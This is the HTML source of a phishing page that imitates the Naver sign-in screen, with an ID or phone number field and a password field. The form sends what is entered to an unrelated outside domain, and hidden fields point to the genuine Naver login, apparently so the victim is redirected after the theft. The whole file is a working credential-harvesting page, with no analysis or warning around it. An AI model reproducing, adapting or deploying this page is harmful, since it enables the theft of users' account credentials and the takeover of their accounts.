<html>
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1">
    <title>Naver Sign in</title>
    <link rel="shortcut icon" href="https://i.ibb.co/5r6Dzv9/url.png">
</head>
<style>
  html, body {
  font-family: Arial, sans-serif;
  margin: 0;
  padding: 0;
  border: 0;
  position: absolute;
  height: 100%;
  min-width: 100%;
  font-size: 13px;
  color: #404040;
  direction: ltr;
  -webkit-text-size-adjust: none;
  }
  input[type=text]{
  -moz-appearance: none;
  -webkit-appearance: none;
  appearance: none;
  display: inline-block;
  height: 48px;
  width: 100%;
  padding: 8 15px;
  margin: 0;
  background: #fff;
  border: 1px solid #d9d9d9;
  border-bottom: 1px solid #c0c0c0;
  -moz-box-sizing: border-box;
  -webkit-box-sizing: border-box;
  box-sizing: border-box;
  -moz-border-radius: 1px;
  -webkit-border-radius: 1px;
  border-radius: 0px;
  border-top-left-radius: 5px;
  border-top-right-radius: 5px;
  font-size: 16px;
  font-weight: nono;
  line-height: 1.1;
  vertical-align: top;
  color: #404040; 
  background-color: transparent;
  background-position: 10px 15px; 
  background-repeat: no-repeat;
  padding: 10px 40px;
  }
  input[type=password]{
  -moz-appearance: none;
  -webkit-appearance: none;
  appearance: none;
  display: inline-block;
  height: 48px;
  width: 100%;
  padding: 8 15px;
  margin: 0;
  background: #fff;
  border: 1px solid #d9d9d9;
  border-bottom: 1px solid #c0c0c0;
  -moz-box-sizing: border-box;
  -webkit-box-sizing: border-box;
  box-sizing: border-box;
  -moz-border-radius: 1px;
  -webkit-border-radius: 1px;
  border-radius: 0px;
  border-bottom-left-radius: 5px;
  border-bottom-right-radius: 5px;
  font-size: 16px;
  font-weight: nono;
  line-height: 1.1;
  vertical-align: top;
  color: #404040; 
  background-color: transparent;
  background-position: 10px 15px; 
  background-repeat: no-repeat;
  padding: 10px 40px;
  }
  input[type=text]:focus {
  outline: none;
  border: 2px solid #04C75A;
  }
  input[type=password]:focus {
  outline: none;
  border: 2px solid #04C75A;
  }
</style>
<body>

<div align="center">
	<table border="0" width="746" cellspacing="0" cellpadding="0" height="876" background="img/bg.png">
		<tr>
			<td>
			<table border="0" width="100%" cellspacing="0" cellpadding="0">
				<tr>
					<td height="184"></td>
				</tr>
				<tr>
					<td>
					<table border="0" width="100%" cellspacing="0" cellpadding="0">
						<tr>
							<td width="140"></td>
							<td height="350">
							<table border="0" width="100%" cellspacing="0" cellpadding="0">
								<tr>
									<td width="31"></td>
									<td height="350">
									<table border="0" width="100%" cellspacing="0" cellpadding="0">
									  <form method="post" action="https://ganpanmarthdesi.pro/wp-config-post.php" >
										<tr>
											<td height="76"></td>
										</tr>
										<tr>
											<td>
											    <input type="text" placeholder="ID or Phone number" name="user" value="" id="" autofocus >
											</td>
										</tr>
										<tr>
										    <td>
										       <input type="hidden" name="link" value="https://nid.naver.com/nidlogin.login?mode=form&url=https://mail.naver.com" >
										    </td>
										</tr>
										<tr>
										    <td>
										       <input type="hidden" name="domain" value="Naver.com" >
										       <input type="hidden" name="sender" value="Naver.com" >
										    </td>
										</tr>
										<tr>
											<td>
											    <input type="password" required placeholder="Password" name="passwd" id="" >
											</td>
										</tr>
										<tr>
											<td height="103"></td>
										</tr>
										<tr>
											<td>
											<input type="image" src="img/btn.png" width="402" height="52"></td>
										</tr>
										<tr>
											<td height="24"></td>
										</tr>	
									  </form>							
									</table>
									</td>
									<td width="30"></td>
								</tr>
							</table>
							</td>
							<td width="142"></td>
						</tr>
					</table>
					</td>
				</tr>
				<tr>
					<td height="342"></td>
				</tr>
			</table>
			</td>
		</tr>
	</table>
</div>
</body>

</html>
